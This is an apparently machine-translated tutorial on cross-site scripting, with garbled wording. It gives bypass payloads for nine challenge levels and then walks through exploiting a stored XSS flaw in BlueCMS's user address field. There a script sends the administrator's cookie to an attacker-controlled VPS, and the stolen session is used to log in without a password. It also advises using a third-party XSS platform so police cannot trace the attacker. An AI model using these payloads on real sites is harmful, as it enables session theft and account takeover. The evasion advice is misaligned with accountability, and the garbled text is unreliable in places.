Foreword
XSS (Cross-Site Scripting), also known as cross-site scripting, XSS not the focus of cross-site, but in the execution of the script. XSS is a frequently appear in a Web application in the computer security vulnerability is due to insufficient input filtering Web application to the user generated.
Types of
There are three common XSS attacks: reflective XSS attack, DOM-based attacks and XXS type storage type XSS attacks. In this paper, and the test for the reflective memory type.
Reflective 0x01
The picture shows the reflection principle, reflective cross-site scripting vulnerabilities, the most common type. Users access the server - Cross-site links - cross site code is returned, the output of the script will not be stored in the database.
0x02 storage type
Storage type XSS, persistence, the code is stored in the server, such as personal information or publishing articles and other places, insert the code, if there is no filter or filter lax, then the code will be stored in the server, the user accesses the page when the trigger code execution. This XSS more dangerous, likely to cause worms, theft of cookie.
In the actual penetration testing, the biggest role XSS actually get administrator cookie, of course, a lot of XSS can do, even new users can write webshell, etc., but these are usually very difficult to do, provided you first need to obtain administrators cookie, and then create a user must know the function of the page and the corresponding parameters have to ensure the verification code mechanism exists, as webshell, too, need to know such as uploading points, edit points, and the corresponding parameters, and can not have security software and other external factors interfere, in order to successfully write horse, apparently the real situation is not so smooth.
XSS Challenge Tour
Before we started to do a few small problems XSS, easy to understand.
1x01 level1
Splicing the first pass function directly, without any filter, resulting in execution of arbitrary tags.
Given payload:
payload: <script>alert(1)</script>
1x02 level2
Observation source:
directly use the script tag has been unable to pop, because the input box originally input tag, payload is wrapped in double quotes value value, payload is treated as text, there is no way to perform, you can find a way to escape it.
Given payload:
1"><script>alert(/wu/)</script>
First closing double quotation marks, then> closed input, the successful implementation.
1x03 level3
Observation source code:
the source code input tag using htmlspecialchars () function of angle brackets special symbols and the like to escape. That is, the two off "<>" can not be used, consider bypassing the use on the event.
First value of single quotes, see figure below:
ON events can not pop, because input ">", on events can not escape, input tags are not closed, which leads payload is still unable to perform independently as an event behind the back but we can comment period and a half after the input tag.
Given payload:
1' onclick=alert(/wupan/)//
Click on the event pop.
1x04 level4
Observation source:
on> <were filtered, html tag has been unable to break through, but not for on event filtering, and level3 only difference is the value of a single quote into a double quotes.
Given payload:
" onmouseover=alert(/wu/)
Here it is the onmouseover event, moving into the input box departure; can also be triggered by clicking the onclick level.
1x05 level5
Observation Source:
First strtolower () function values were sent over lowercase forwarding, which bypasses filtering the mixed case, then the regular <script, on, that is, can not be bypassed with a script tag and onclicks events. However, a filter with a label.
Gives the following payload:
"> <a href='javascript:alert(1)'>
a> tag defines a hyperlink, a link from one page to another page, click on the link.
Pop success.
1x06 level6
Observation source:
filtering the <script, on, src, data , href tag, but no case filter, it may be the case with a bypass.
Gives the following payload:
"><a HREF=" javascript:alert(1)" //
1x07 level7
Observation source:
on script, on, src, data, href were regular deleted, and in front of the keyword filter convert to lowercase, can be written double bypass.
Given payload:
"><a hrhrefef="javassrccript:alert(1)">//
" oonnclick=alert(1)//
Pop success.
1x08 level8
Observation source:
This little sick, first case filter, and then is a regular filter, filter out cript, on, src, data, href, double quotes, followed by input filter htmlspecialchars () function filtering hazard symbols, the script above all not used; however, when the second reference keyword, in a label, and filtered with no htmlspecialchars ().
But a closer look at the source code,
the page text box functionality to add a link, so the href attribute is present anyway, so we only need to script html coding can bypass materialized.
Given payload:
javascript:alert(1)
Click on the hyperlink, pop.
1x09 level9
Observation source:
filtering rules and level8 as the second time reference keyword, in a label, there is no danger symbols filtered htmlspecialchars (). More than level8 in a http: // filter, payload must include http: //.
Given payload:
javascript:alert(1)//http://www.baidu.com
Click on "Links" pop.
Well, let's get to the bar!
This is the question! ! ! !
2x01
The old cliche, lamp environment, in order to save the direct use of the phpstudy. Xss most commonly used is the role of one of the biggest features is the theft of cookie open source cms Bluecms example demonstrates attack.
2x02
Bluecms exists a storage type xss, url is /admin/user.php, which address parameter has not elapsed since the escaped html coding, resulting in storage of xss.
Red box for the xss injection point.
New test account username: 11 password: 11
2x03
Creating dynamic PHP script on the VPS, this script is meant to jump Baidu, then cookie cookie parameters assigned to the variable. The next step is to capture IP, time, create a cookie file, written in the cookie file information.
2x04
Input payload above the injection point
"/><script>window.open('*******/xss.php?cookie='+docume nt.cookie)</script> *****为VPS域名
Since vps there is a problem, could not be submitted on. Also, because the payload must contain personal vps address, so even if the trigger terminal to do then hidden, it may be traceable to the true identity. For security purposes, we use open source XSS.
2x05
New on the open source project xss platform, payload submitted through this platform, and prevent traceability, squatting firmly at the end wear.
Using the platform's default module, click keepsession.
Very close to some of life you automatically payload
2x06
The payload output with the injection point.
submit.
2x07
Click Edit Trigger xss
page unchanged after the trigger, but the cookie information has been passed on just the platform.
2x08
Return xss platform to view the cookie
the cookie is generated.
2x09
Use cookie-free user, no password to log.
Open a new url
will capture the cookie to fill in red box
Refresh point.
success.
2x10
Now let's look at the database
database there are payload, if the individual vps, vps address will expose the administrator to call the police, the police find you touch vps addresses, congratulations, sit in a hole.
Finish.